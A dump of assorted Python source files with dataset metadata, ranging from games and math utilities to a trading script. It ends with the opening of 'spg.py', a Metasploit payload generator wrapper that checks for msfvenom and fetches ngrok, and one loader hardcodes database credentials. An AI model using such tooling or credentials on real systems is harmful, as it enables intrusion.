# if not ice or teleport, perform collision check
if LaserTankMap.cell_is_blocked(game_map, next_y, next_x):
action_reward = game_map.collision_cost
action_value = \
self.values[game_map.player_x - 1][game_map.player_y - 1][
next_heading]
return action_reward, action_value
# check for game over conditions
if LaserTankMap.cell_is_game_over(game_map, next_y, next_x):
action_reward = game_map.game_over_cost
action_value = self.values[next_x - 1][next_y - 1][
next_heading]
elif game_map.grid_data[game_map.player_y][
game_map.player_x] == LaserTankMap.FLAG_SYMBOL:
action_reward = game_map.goal_reward
action_value = self.values[next_x - 1][next_y - 1][
next_heading]
else:
action_reward = game_map.move_cost
action_value = self.values[next_x - 1][next_y - 1][
next_heading]
return action_reward, action_value
if __name__ == "__main__":
run_value_iteration()
| true |
b0629ca7ba24cee6c36c50e1c2be2f21002639e7 | Python | Di-ayy-go/fact-ai | /python/distributions.py | UTF-8 | 5,110 | 3.234375 | 3 | [] | no_license | import numpy as np
from random_handler import RandomHandler
import scipy.stats as sc
class UniformDistribution(sc.distributions.rv_frozen):
"""
Wrapper for Scipy uniform distribution.
Contains additional methods needed to reproduce results of paper.
args:
loc (int): mean of distribution
scale (int): range/standard deviation of distribution
n (int): number of samples to be generated
(placeholder to make this class interchangable with BinomialDistribution)
"""
def __init__(self, loc, scale, n):
super(UniformDistribution, self).__init__(sc.uniform, loc, scale)
self.loc = loc
self.scale = scale
p_th = np.zeros(n)
V = np.zeros(n)
V[n - 1] = scale / 2
for i in range(n - 2, -1, -1):
p_th[i] = V[i + 1]
V[i] = (scale + p_th[i]) / 2
self.p_th = p_th
self.V = V
def PThreshold(self, index):
"""
Returns PThreshold value at index `index`
args:
index (int/list): indices to be retrieved
"""
return self.p_th[index]
def Sample(self, size):
"""
Wrapper for rvs sampling method for code clarity
and consistency with original C++ codebase
args:
size (int): number of samples to be generated
"""
return self.rvs(size=size)
def Middle(self, n):
"""
Computes middle value of distribution using `n` values.
args:
n (int): number of values to consider to calculate middle.
"""
return self.scale * (1 / 2) ** (1 / n)
def Reverse(self, x):
"""
Returns
"""
return x * self.scale
class BinomialDistribution(sc.distributions.rv_frozen):
"""
Wrapper for Scipy binomial distribution.
Contains additional methods needed to reproduce results of paper.
args:
n (int): number of independent experiments
p (int): probability of success of Bernoulli trial
"""
def __init__(self, n, p):
super(BinomialDistribution, self).__init__(sc.binom, n, p)
self.n = n
n = n + 1
choose = np.zeros((n, n))
probability = np.ones(n)
r_probability = np.ones(n)
choose[:, 0] = 1
for i in range(1, n):
for j in range(1, n):
choose[i][j] = choose[i - 1][j - 1] + choose[i - 1][j]
for i in range(1, n):
probability[i] = probability[i - 1] * p
r_probability[i] = r_probability[i - 1] * (1 - p)
self.choose = choose
self.probability = probability
self.r_probability = r_probability
self._ComputeMaxDist(n)
def Expected(self, lower_bound):
"""
Calculates expected value using lower bound.
Based on implementation in C++ repo.
args:
lower_bound (int): lower bound of expected value
"""
ans = 0
rang = 0
n = len(self.probability) - 1
i = int(np.ceil(lower_bound * n))
while i <= n:
ans += self.probability[i] * self.r_probability[n - i] * self.choose[n][i] * i / n;
rang += self.probability[i] * self.r_probability[n - i] * self.choose[n][i];
i += 1
return ans / rang
def Reverse(self, x):
"""
Computes reverse of x using numpy arrays for efficiency
"""
a = np.cumsum(self.choose[self.n] * self.probability * self.r_probability[::-1])
c = x - a[..., None]
result = np.argmax(c <= 0, axis=0) / self.n
result[result == 0] = 1
return result
def Sample(self, size):
"""
Wrapper for rvs sampling method for code clarity
and consistency with original C++ codebase
args:
size (int): number of samples to be generated
"""
rand = np.random.uniform(size=size)
return (self.rvs(size=size) + rand) / len(self.probability)
def Middle(self, n):
"""
n is passed because for compatibility. It used in UniformDistribution.
"""
for i in range(len(self.max_dist) - 1, -1, -1):
if self.max_dist[i] >= 0.5:
return i / (len(self.max_dist) - 1)
return 0
def _ComputeMaxDist(self, num_dists):
"""
Internal method for computing max_dist array.
"""
max_dist = np.zeros(len(self.probability))
x = 0
n = self.n
for i in range(n, -1, -1):
x += self.choose[n][i] * self.probability[i] * self.r_probability[n - i]
max_dist[i] = 1 - (1 - x) ** num_dists
# Computing PThreshold
V, p_th = np.zeros(num_dists), np.zeros(num_dists)
V[num_dists - 1] = self.Expected(0)
for i in range(num_dists - 2, -1, -1):
p_th[i] = V[i + 1]
V[i] = self.Expected(p_th[i])
self.V = V
self.p_th = p_th
self.max_dist = max_dist
def PThreshold(self, index):
return self.p_th[index]
| true |
811b3d3882263967f51f24773cee0de80640277d | Python | haowen-xu/tfsnippet | /tfsnippet/utils/scope.py | UTF-8 | 2,845 | 2.703125 | 3 | [
"MIT"
] | permissive | from contextlib import contextmanager
import six
import tensorflow as tf
from tensorflow.python.ops import variable_scope as variable_scope_ops
__all__ = [
'get_default_scope_name',
'reopen_variable_scope',
'root_variable_scope',
]
def get_default_scope_name(name, cls_or_instance=None):
"""
Generate a valid default scope name.
Args:
name (str): The base name.
cls_or_instance: The class or the instance object, optional.
If it has attribute ``variable_scope``, then ``variable_scope.name``
will be used as a hint for the name prefix. Otherwise, its class
name will be used as the name prefix.
Returns:
str: The generated scope name.
"""
# compose the candidate name
prefix = ''
if cls_or_instance is not None:
if hasattr(cls_or_instance, 'variable_scope') and \
isinstance(cls_or_instance.variable_scope, tf.VariableScope):
vs_name = cls_or_instance.variable_scope.name
vs_name = vs_name.rsplit('/', 1)[-1]
prefix = '{}.'.format(vs_name)
else:
if not isinstance(cls_or_instance, six.class_types):
cls_or_instance = cls_or_instance.__class__
prefix = '{}.'.format(cls_or_instance.__name__).lstrip('_')
name = prefix + name
# validate the name
name = name.lstrip('_')
return name
@contextmanager
def reopen_variable_scope(var_scope, **kwargs):
"""
Reopen the specified `var_scope` and its original name scope.
Args:
var_scope (tf.VariableScope): The variable scope instance.
**kwargs: Named arguments for opening the variable scope.
"""
if not isinstance(var_scope, tf.VariableScope):
raise TypeError('`var_scope` must be an instance of `tf.VariableScope`')
with tf.variable_scope(var_scope,
auxiliary_name_scope=False,
**kwargs) as vs:
with tf.name_scope(var_scope.original_name_scope):
yield vs
@contextmanager
def root_variable_scope(**kwargs):
"""
Open the root variable scope and its name scope.
Args:
**kwargs: Named arguments for opening the root variable scope.
"""
# `tf.variable_scope` does not support opening the root variable scope
# from empty name. It always prepend the name of current variable scope
# to the front of opened variable scope. So we get the current scope,
# and pretend it to be the root scope.
scope = tf.get_variable_scope()
old_name = scope.name
try:
scope._name = ''
with variable_scope_ops._pure_variable_scope('', **kwargs) as vs:
scope._name = old_name
with tf.name_scope(None):
yield vs
finally:
scope._name = old_name
| true |
b6ee58e733d445d03d8552cbd81ac2e96bbc4b41 | Python | lorenzoFerri95/LaboratoryOfDataScience | /LDS_Part1_Group5/02_dimensions.py | UTF-8 | 1,369 | 2.53125 | 3 | [] | no_license | # Load dimensions' tables to SQL Server
import pyodbc
from csv import reader
# Connection to SQL Server
server = 'tcp:apa.di.unipi.it'
database = 'Group5HWMart'
username = 'group5'
password = 'w9hez'
connectionString = 'DRIVER={ODBC Driver 17 for SQL Server};\
SERVER='+server+';DATABASE='+database+';\
UID='+username+';PWD='+password
cnxn = pyodbc.connect(connectionString)
cursor = cnxn.cursor()
# Dimensions' files (except time) and corresponding table names in SQL Server
files_tables = [("cpu.csv", "Cpu_Product"), ("geography.csv", "Geography"),\
("gpu.csv", "Gpu_Product"), ("ram.csv", "Ram_Product"),\
("vendor.csv", "Vendor")]
# Iterates for each dimensions' file
for filename, table in files_tables:
# Open file
fp = open(filename)
file = reader(fp)
header = next(file)
# Build query
tablename = "[Group5HWMart].[group5].["+ table +"] (" + ", ".join(header) + ")"
placeholders = "?"
for i in range(len(header) - 1):
placeholders += ",?"
query = "INSERT INTO "+ tablename + " VALUES " + "("+placeholders+")"
# Execute queries
for line in file:
cursor.execute(query, tuple(line))
# close file
fp.close()
# Commit and close connection
cursor.commit()
cursor.close()
cnxn.close()
| true |
c417270ec87317f69d57fe0de3529ae54aebb6b6 | Python | hemant6488/stepup-algos | /arrays/2019_9h_2d_hourglass_maximum_sum.py | UTF-8 | 473 | 3.46875 | 3 | [] | no_license | def hourglassSum(arr):
sums = []
for i in range(len(arr) - 2):
for j in range(len(arr[i]) - 2):
hourglassSum = arr[i][j] + arr[i][j+1] + arr[i][j+2] + arr[i+1][j+1] + arr[i+2][j] + arr[i+2][j+1] + arr[i+2][j+2]
sums.append(hourglassSum)
return max(sums)
if __name__ == '__main__':
arr = []
for _ in range(6):
arr.append([int(z) for z in input().strip().split()])
# print(arr)
print(hourglassSum(arr))
| true |
6cf58b387997756a86104cbc54fdda159d8b7edc | Python | huuhoa020899/Neural | /KTSNT.py | UTF-8 | 275 | 3.046875 | 3 | [] | no_license | def KTSNT():
x=int(input ("enter x:"))
dem =0
for i in range(1,x+1):
if x % int( i) == 0:
dem=dem+1;
if dem>2:
break
if dem==2:
print("N la so nguyen to")
else:
print (" N k la so nguyen to")
KTSNT() | true |
a9918c9031d924435d179d3cbbefaa49b253ef97 | Python | brnmsmith/rhinoUnfolder | /rhino_unwrapper/Map.py | UTF-8 | 1,422 | 2.578125 | 3 | [] | no_license | #Map
from rhino_helpers import getTVertsForEdge
class Map(object):
"""Map:a class for keeping track of the relation between the net and the mesh"""
def __init__(self,mesh):
#super(Map, self).__init__()
self.meshVerts = {}
self.meshEdges = {}
self.meshFaces = {}
for i in xrange(mesh.TopologyVertices.Count):
self.meshVerts[i] = []
for j in xrange(mesh.TopologyEdges.Count):
self.meshEdges[j] = []
#faces do not need to be lists, since each meshFace has one netFace
# self.netToMesh = {} waittt this data can all be stored in the elements in net
def updateEdgeMap(self,edge,netEdge):
'''To be called imediately after adding an edge'''
self.meshEdges[edge].append(netEdge)
def updateVertMap(self,tVert,netVert):
self.meshVerts[tVert].append(netVert)
def getSiblingNetEdge(self,edge,netEdge):
'''for a cut edge get the sibling edge'''
edges = self.meshEdges[edge]
netEdges = set(edges)
netEdge = set([netEdge])
singleEdge = netEdges-netEdge
return singleEdge.pop()
def getNetEdges(self,meshEdge):
return self.meshEdges[meshEdge]
def getRecentNetVertsForEdge(self,mesh,edge):
meshI,meshJ = getTVertsForEdge(mesh,edge)
netI = self.getRecentNetVert(meshI)
netJ = self.getRecentNetVert(meshJ)
return netI,netJ
def getRecentNetVert(self,tVert):
return self.meshVerts[tVert][-1] #get last item in list
| true |
27b8df86ce8286bc6b712041ca0042fd8f7d44ac | Python | mccurrymitchell3/ems_simulation | /incidents.py | UTF-8 | 1,788 | 2.765625 | 3 | [] | no_license | import callcenter
import globals
import random
import datetime
class Incidents:
# generates incidents at 15 minute intervals
def __init__(self):
#self.callRate = 1 #this will eventually be a curve
self.intervalMax = 15
# generates a random number of events for the interval and generates random
# incident times, event times, and locations
def generateAndAdd(self, cc):
# get num events for each to be generated
print("generating events")
# numEvents = random.randint(6, 18) # this range is based on the min and max number of calls averaged over a week from our data source.
hour = globals.now // 60
mins = globals.now % 60
if globals.day_type == 'weekend':
freq_range = globals.callfreq_weekdays_range[datetime.time(hour, mins)]
else:
freq_range = globals.callfreq_weekends_range[datetime.time(hour, mins)]
numEvents = random.randint(freq_range[0], freq_range[1])
print("numEvents:", numEvents)
# for each event, pick a time, pick a type, assign
for event in range(numEvents):
# assign a random time within the interval
timeOfEvent = globals.now + random.randint(0, self.intervalMax)
severity = random.choices([1, 2, 3, 4, 5, 6, 7, 8], globals.severity_weights_list)[0]
eventType = random.choice(globals.severity_to_description[severity])
# location = random.randint(0, 9) #need to fix
location = random.choices(list(globals.zipcode_frequency.keys()), list(globals.zipcode_frequency.values()))[0]
print('location', location)
print((timeOfEvent, eventType, location))
cc.cc_log.put((timeOfEvent, eventType, location))
| true |
08be1931eaf581c4f37174532c6b6415834207c6 | Python | flacout/algorithm-bucket | /NP_reduce_2-SAT.py | UTF-8 | 1,809 | 3.265625 | 3 | [] | no_license | # python3
# Reduction to SAT
# the file output is to use with my minisat solver
# for which the format is a little different from the grader
n, m = map(int, input().split())
edges = [ list(map(int, input().split())) for i in range(m) ]
#f = open('cl.txt', 'w')
# This solution prints a simple satisfiable formula
# and passes about half of the tests.
# Change this function to solve the problem.
def printEquisatisfiableSatFormula():
printHeader()
for v in range(n):
printVertexClause(v)
for e in edges:
printEdgeClause(e)
def printHeader():
nb_clauses = n+m*3
nb_var = n*3
print(str(nb_clauses)+' '+str(nb_var))
#f.write('p cnf '+str(nb_var)+' '+str(nb_clauses)+'\n')
# clause each vertex has to be colored by some color
# vertex nb from 1 to ...n
# color 1 to 3
# CNF (V11 V12 V13)(V21 V22 V23)...(Vn1 Vn2 Vn3)
def printVertexClause(v):
col1 = (v*3)+1
col2 = (v*3)+2
col3 = (v*3)+3
print(str(col1)+' '+str(col2)+' '+str(col3)+' 0')
f.write(str(col1)+' '+str(col2)+' '+str(col3)+' 0'+'\n')
# clause vertices connected by an edge must have different colors
# CNF (!Vu1 !Vv1)(!Vu2 !Vv2)(!Vu3 !Vv3)
# CNF true if all term in parentesis are different
# if same color: (!1 !1)=0 = false CNF
def printEdgeClause(e):
# variable Vij for each vertex i color j
# access variable number by multiplying index by 3
vi = ((e[0]-1)*3)
ei = ((e[1]-1)*3)
print('-'+str(vi+1)+' -'+str(ei+1)+' 0')
print('-'+str(vi+2)+' -'+str(ei+2)+' 0')
print('-'+str(vi+3)+' -'+str(ei+3)+' 0')
f.write('-'+str(vi+1)+' -'+str(ei+1)+' 0'+'\n')
f.write('-'+str(vi+2)+' -'+str(ei+2)+' 0'+'\n')
f.write('-'+str(vi+3)+' -'+str(ei+3)+' 0'+'\n')
#################
# MAIN
#################
printEquisatisfiableSatFormula()
f.close()
| true |
d822e321e50c4c036bc65bfb16ee9b211cb934d6 | Python | 6igsm0ke/Introduction-to-Programming-Using-Python-Liang-1st-edtion | /CH06/EX6.11.py | UTF-8 | 598 | 3.9375 | 4 | [] | no_license | # 6.11 (Financial application: compute commissions) Write a function that computes
# the commission, using the scheme in Exercise 5.39. The header of the function is:
# def computeCommission(salesAmount):
# Write a test program that displays the following table:
# Sales Amount Commission
# 10000 900.0
# 15000 1500.0
# ...
# 95000 11100.0
# 100000 11700.0
from CH6Module import MyFunctions
print("Sales Amount\t\tCommission")
salesAmount = 10000
for i in range(1, 20):
print(salesAmount, format(" ", "14s"), format(MyFunctions.computeCommission(salesAmount), ".1f"))
salesAmount += 5000
| true |
66268d5bf7c98bc3de93f61bb3d83f1ff31ddff4 | Python | luukhoai/zipairline-sample | /zipairline/serializers.py | UTF-8 | 2,292 | 2.703125 | 3 | [] | no_license | from rest_framework import serializers
from rest_framework.serializers import ModelSerializer
from .models import ZipAirplane, ZipAirline
class ZipAirplaneSerializer(ModelSerializer):
class Meta:
model = ZipAirplane
fields = ('airplane_id', 'passenger_numb', 'airline')
def validate_airplane_id(self, value):
"""
Validate airplane_id, should be positive integer
:param value:
:return: value
"""
if value < 0:
raise serializers.ValidationError('airplane_id should be positive integer value.', code='input')
return value
def validate_passenger_numb(self, value):
"""
Validate passenger_numb, should be positive integer
:param value:
:return:
"""
if value < 0:
raise serializers.ValidationError('passenger_numb shoud be positive integer value.')
return value
def validate(self, order_dict):
"""
Validate fly_time, should be larger than 1 minute
:param order_dict:
:return: order_dict
"""
airplane_id = order_dict['airplane_id']
passenger_numb = order_dict['passenger_numb']
airline = ZipAirplane(airplane_id=airplane_id, passenger_numb=passenger_numb)
if airline.fly_time < 1:
raise serializers.ValidationError('fly_time should be larger than 1.')
return order_dict
class ZipAirplaneCreateSerializer(ZipAirplaneSerializer):
class Meta:
model = ZipAirplane
fields = ('airplane_id', 'passenger_numb')
class ZipAirlinesSerializer(ModelSerializer):
airplanes = ZipAirplaneCreateSerializer(many=True)
class Meta:
model = ZipAirline
fields = ('airline_name', 'airplanes')
def create(self, validated_data):
"""
Create airplane
:param validated_data: eg: {'airline_name': 'TestAirline', 'airplanes': [...]}
:return: airline
"""
airline_name = validated_data.pop('airline_name')
airplanes = validated_data.pop('airplanes')
airline = ZipAirline.objects.get(airline_name=airline_name)
for airplane_data in airplanes:
ZipAirplane.objects.create(airline=airline, **airplane_data)
return airline
| true |
f5521afc0d0abd048b0ec68fb124c5684d2b8019 | Python | JinyongYoon/Python-for-everyone | /py4e3 - Access Web Data/exercise/exercise ch11~12.py | UTF-8 | 1,341 | 3.015625 | 3 | [] | no_license | # # Exercise (Regular Expressions)
# import re
# handle = open("/Users/jinyong/py4e/actual.txt")
# total = 0
# x = list()
# for line in handle:
# y = re.findall('[0-9]+', line)
# if len(y) == 0:
# continue
# for num in range(0, len(y)):
# total = total + int(y[num])
# print(total)
# # Exercise of HTTP Request
# import socket
# mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# mysock.connect(('data.pr4e.org', 80))
# cmd = 'GET http://data.pr4e.org/intro-short.txt HTTP/1.0\r\n\r\n'.encode()
# mysock.send(cmd)
# while True:
# data = mysock.recv(512)
# if len(data) < 1:
# break
# print(data.decode())
# mysock.close()
# # Exercise of urllib
# import urllib.request, urllib.parse, urllib.error
# fhand = urllib.request.urlopen('http://data.pr4e.org/romeo.txt')
# counts = dict()
# for line in fhand:
# words = line.decode().split()
# for word in words:
# counts[word] = counts.get(word, 0) + 1
# print(counts)
# # Exercise of BeautifulSoup
# import urllib.request, urllib.parse, urllib.error
# from bs4 import BeautifulSoup
# url = input('Enter - ')
# html = urllib.request.urlopen(url).read()
# soup = BeautifulSoup(html, 'html.parser')
# # Retrieve all of the anchor tags
# tags = soup('a')
# for tag in tags:
# print(tag.get('href', None))
| true |
822ea3d61fde908f65540fcea8cd98cbacca57b5 | Python | mubasheerusain/Python-programs | /min_unique.py | UTF-8 | 536 | 3.140625 | 3 | [] | no_license | def check(s):
b =[]
for i in s:
b.append(i)
b.sort()
print(b)
c =[]
for i in range(0,len(b)):
if i<len(b)-1:
if b[i]!=b[i+1] and b[i]!=b[i-1] :
c.append(b[i])
l = len(s)
if b[l-1] != b[l-2]:
c.append(b[l-1])
print(c)
c.pop(0)
c.pop(0)
a = []
for i in s:
if i not in c:
a.append(i)
u = ""
for i in a:
u += i
return u
s=input("Enter a string: ")
ans = check(s)
print(ans)
| true |
6ea3519ad455054757993295cdaa18f7267c8c1c | Python | Eliogeno/Space-Game | /my_space_game.py | UTF-8 | 8,890 | 2.78125 | 3 | [] | no_license | # Intro to GameDev - main game file
import pgzrun
import random
WIDTH = 1000
HEIGHT = 600
SCOREBOX_HEIGHT = 60
#keep track of score
score = 0
junk_collect = 0
level = 0
level_screen = 0
lvl2_LIMIT = 5
lvl3_LIMIT = 10
#sprite speeds
JUNK_SPEED = 5
SATELLITE_SPEED = 3
DEBRIS_SPEED = 3
LASER_SPEED = -5 # lasers are moving towards the left on screen
BACKGROUND_IMG = "background_logo"
PLAYER_IMG = "player"
JUNK_IMG = "space_junk"
SATELLITE_IMG = "satellite_adv"
DEBRIS_IMG = "space_debris2"
LASER_IMG = "laser_red"
START_IMG = "start_button"
INSTRUCTIONS_IMG = "instructions_button"
def init():
global player, junks, lasers, satellite, debris
player = Actor(PLAYER_IMG)
player.midright = (WIDTH - 15, HEIGHT/2)
# initialize junk sprites
junks = [] # list to keep track of junks
for i in range(5):
junk = Actor(JUNK_IMG) # create a junk sprite
x_pos = random.randint(-500, -50)
y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)
junk.topright = (x_pos, y_pos) # rect_position = (x, y)
junks.append(junk)
# initialize lasers
lasers = []
player.laserActive = 1
# initialize satellite
satellite = Actor(SATELLITE_IMG) # create sprite
x_sat = random.randint(-500, -50)
y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)
satellite.topright = (x_sat, y_sat) # rect_position
# initialize debris
debris = Actor(DEBRIS_IMG)
x_deb = random.randint(-500, -50)
y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)
debris.topright = (x_deb, y_deb)
# background music
music.play("spacelife")
# initialize title screen buttons
start_button = Actor(START_IMG)
start_button.center = (WIDTH/2, 425)
instructions_button = Actor(INSTRUCTIONS_IMG)
instructions_button.center = (WIDTH/2, 500)
def on_mouse_down(pos):
global level, level_screen
if start_button.collidepoint(pos):
level = 1
level_screen = 1
print("start button pressed!")
if instructions_button.collidepoint(pos):
level = -1
print("instructions button pressed!")
# game loop
init()
def update():
global score, junk_collect, level, level_screen, BACKGROUND_IMG
if junk_collect == lvl2_LIMIT: # level 2
level = 2
if junk_collect == lvl3_LIMIT: # level 3
level = 3
if level == -1: # instructions screen
BACKGROUND_IMG = "background_level1"
if score >= 0 and level >= 1:
if level_screen == 1: # level 1 title screen
BACKGROUND_IMG = "background_level1"
if keyboard.RETURN == 1:
level_screen = 2
if level_screen == 2: # level 1 gameplay
updatePlayer() # calling our player update function
updateJunk() # calling junk update function
if level == 2 and level_screen <= 3: # level 2 title
BACKGROUND_IMG = "background_level2"
level_screen = 3
if keyboard.RETURN == 1:
level_screen = 4
if level_screen == 4: # level 2 gameplay
updatePlayer()
updateJunk()
updateSatellite()
if level == 3 and level_screen <= 5: # level 3 title
level_screen = 5
BACKGROUND_IMG = "background_level3"
if keyboard.RETURN == 1:
level_screen = 6
if level_screen == 6: # level 3 game play
updatePlayer()
updateJunk()
updateSatellite()
updateDebris()
updateLasers()
if score < 0 or level == -2: # game over or end game
if keyboard.RETURN == 1:
BACKGROUND_IMG = "background_logo"
score = 0
junk_collect = 0
level = 0
init()
def draw():
screen.clear()
screen.blit(BACKGROUND_IMG, (0,0))
if level == -1:
start_button.draw()
show_instructions = "Use UP and DOWN arrow keys to move your player\n\npress SPACEBAR to shoot"
screen.draw.text(show_instructions, midtop=(WIDTH/2, 70), fontsize=35, color="white")
if level == 0:
start_button.draw()
instructions_button.draw()
if level >= 1:
player.draw() # draw player sprite on screen
for junk in junks:
junk.draw() # draw junk sprite on screen
if level >= 2:
satellite.draw()
if level == 3:
debris.draw()
for laser in lasers:
laser.draw()
# game over screen
if score < 0:
game_over = "GAME OVER\npress ENTER to play again"
screen.draw.text(game_over, center=(WIDTH / 2, HEIGHT / 2), fontsize=60, color="white")
#draw some text on the screen
show_score = "Score: " + str(score) # remember to convert score to a string
screen.draw.text(show_score, topleft=(650, 15), fontsize=35, color="white")
show_collect_value = "Junk: " + str(junk_collect)
screen.draw.text(show_collect_value, topleft=(450, 15), fontsize=35, color="white")
if level >= 1:
show_level = "LEVEL " + str(level)
screen.draw.text(show_level, topright=(375, 15), fontsize=35, color="white")
if level_screen == 1 or level_screen == 3 or level_screen == 5:
show_level_title = "LEVEL " + str(level) + "\nPress ENTER to continue..."
screen.draw.text(show_level_title, center=(WIDTH/2, HEIGHT/2), fontsize=70, color="white")
# make separate functions for each of our sprites
def updatePlayer():
# check for user input
if keyboard.up == 1:
player.y += -5 # moving up is in negative y direction
elif keyboard.down == 1:
player.y += 5 # moving down is in the postive y direction
# prevent player from moving off screen
if player.top < 0:
player.top = 0
if player.bottom > HEIGHT:
player.bottom = HEIGHT
#check for firing lasers
if keyboard.space == 1 and level == 3:
laser = Actor(LASER_IMG)
laser.midright = (player.midleft)
fireLasers(laser) # this is a function from the template code
def updateJunk():
global score, junk_collect
for junk in junks:
junk.x += JUNK_SPEED
collision = player.colliderect(junk)
if junk.left > WIDTH or collision == 1:
x_pos = random.randint(-500, -50)
y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)
junk.topleft = (x_pos, y_pos)
# collisions between player and junk
if collision:
score += 1 # update the score
junk_collect += 1
def updateSatellite():
global score
satellite.x += SATELLITE_SPEED # or just put 3
collision = player.colliderect(satellite)
if satellite.left > WIDTH or collision == 1:
x_sat = random.randint(-500, -50)
y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)
satellite.topright = (x_sat, y_sat)
if collision == 1:
score += -10
def updateDebris():
global score
debris.x += DEBRIS_SPEED # or just put 3
collision = player.colliderect(debris)
if debris.left > WIDTH or collision == 1:
x_deb = random.randint(-500, -50)
y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)
debris.topright = (x_deb, y_deb)
if collision == 1:
score += -10
def updateLasers():
global score
for laser in lasers:
laser.x += LASER_SPEED
# remove laser if moves off screen
if laser.right < 0:
lasers.remove(laser)
#check for collisions
if satellite.colliderect(laser) == 1:
lasers.remove(laser)
x_sat = random.randint(-500, -50)
y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)
satellite.topright = (x_sat, y_sat)
score += - 5 # decrease the score
if debris.colliderect(laser) == 1:
lasers.remove(laser)
x_deb = random.randint(-500, -50)
y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)
debris.topright = (x_deb, y_deb)
score += 5 # increase the score
# activating lasers (template code)____________________________________
player.laserActive = 1 # add laserActive status to the player
def makeLaserActive(): # when called, this function will make lasers active again
global player
player.laserActive = 1
def fireLasers(laser):
if player.laserActive == 1: # active status is used to prevent continuous shoot when holding space key
player.laserActive = 0
clock.schedule(makeLaserActive, 0.2) # schedule an event (function, time afterwhich event will occur)
sounds.laserfire02.play() # play sound effect
lasers.append(laser) # add laser to lasers list
pgzrun.go()
| true |
fa23a3c47e4f8134123a8175f234dd2239bfc60b | Python | saeeds255/bfx-python | /SellOrderSL.py | UTF-8 | 1,031 | 3 | 3 | [] | no_license |
from Bitfinex import Bitfinex
import json
import time
import sys
BFX = Bitfinex('API_KEY', 'API_SECRET', 'https://api.bitfinex.com/v1')
def startit():
slprice = 2365.5
myorder = BFX.positions()
possymbol = str(myorder[0]['symbol'])
posamount = float(myorder[0]['amount'])
print("Position symbol: " + possymbol + " /Position amount: " + str(posamount) + " \n")
price = BFX.get_ticker(possymbol)
marketprice = float(price['last_price'])
while (marketprice < slprice):
time.sleep(2)
price = BFX.get_ticker(possymbol)
marketprice = float(price['last_price'])
if (marketprice >= slprice):
myorder = BFX.buy(possymbol,posamount,marketprice,"market")
print("Order ID: " + str(myorder['order_id']) + " / Direction: " + str(myorder['side']) + " / Price: " + str(myorder['price']) + " / Order amount: " + str(myorder['original_amount']) + " \n")
sys.exit()
startit()
| true |
1ed7225e54643574a34a9d2d6e00174166532ac5 | Python | Benyamin-creator/simple-payload-generator | /spg.py | UTF-8 | 11,761 | 2.671875 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/python
#-*- coding: utf-8 -*-
################################################################################
# #
# SPG #
# Simple Payload Generator #
# by: Assassin umz #
# #
# Follow me : #
# •YouTube: https://youtube.com/c/pixiters #
# •Discord: https://discord.gg/3nfQadt #
# •Website: http://pixiters.ga #
# •GitHub: https://github.com/Assassinumz #
# #
# LICENSE #
# THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE #
# THIS SOFTWARE AT YOUR OWN RISK. The use of this software Simple Payload #
# Generator(SPG) is COMPLETE RESPONSIBILITY of the END-USER. Developers assume #
# NO liability and are NOT responsible for any misuse or damage caused by #
# this program. #
# #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY #
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND #
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT #
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF #
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE #
# #
################################################################################
import os, platform, wget
from SimpleHTTPServer import test
from sys import exit
from time import sleep
red= '\033[91m'
orange= '\33[38;5;208m'
green= '\033[92m'
cyan= '\033[36m'
bold= '\033[1m'
end= '\033[0m'
def head():
os.system('clear')
print'''{0}
█████████ ████████ ████████
███ ███ ██ ███
███ ███ ██ ███
█████████ ████████ ███ ████
███ ███ ███ ██
███ ███ ███ ██
█████████ ███ █████████
|====(Simple Payload Generator)====|{3}
{2}Follow me :{3}
{1}•{3} GitHub : {4}https://github.com/Assassinumz{3}
{1}•{3} YouTube: {4}https://youtube.com/c/pixiters{3}
{1}•{3} Discord: {4}https://discord.gg/3nfQadt{3}
{1}•{3} Website: {4}http://pixiters.ga{3}
'''.format(orange, green, bold, end, cyan)
def disclaimer():
print('This tool was developed for learning purposes only and the use is complete responsibility of the end-user. Do you accept to cause no harm to any machine and use this tool for educational purposes only ? {0}(yes/no){1}').format(bold, end)
if raw_input("\n{0}{1}SPG:~#{2} ".format(green, bold, end)) == 'yes':
print('{0}Proceeding...{1}').format(green, end)
sleep(1)
else:
print('{0}You must accept the terms and conditions to use this tool.{1}').format(red, end)
exit(0)
def finish():
head()
print('{0}Until next time...{1}').format(green, end)
exit(0)
def present():
if os.path.isfile('/usr/bin/msfvenom') == False:
print('{0}Failed to locate msfvenom. Make sure Metasploit-Framework is installed correctly and try again.{1}').format(red, end)
exit(0)
if os.path.isdir('output') == False:
head()
print('{0}Creating output directory{1}').format(green, end)
os.makedirs('output')
sleep(1)
if os.path.isfile('ngrok') == False:
head()
print("{0}Downloading Ngrok...{1}").format(green, end)
if platform.architecture == "32bit":
wget.download('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.tgz')
os.system('tar -xf ngrok-stable-linux-386.tgz')
os.system('rm ngrok-stable-linux-386.tgz')
else:
wget.download('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.tgz')
os.system('tar -xf ngrok-stable-linux-amd64.tgz')
os.system('rm ngrok-stable-linux-amd64.tgz')
def server():
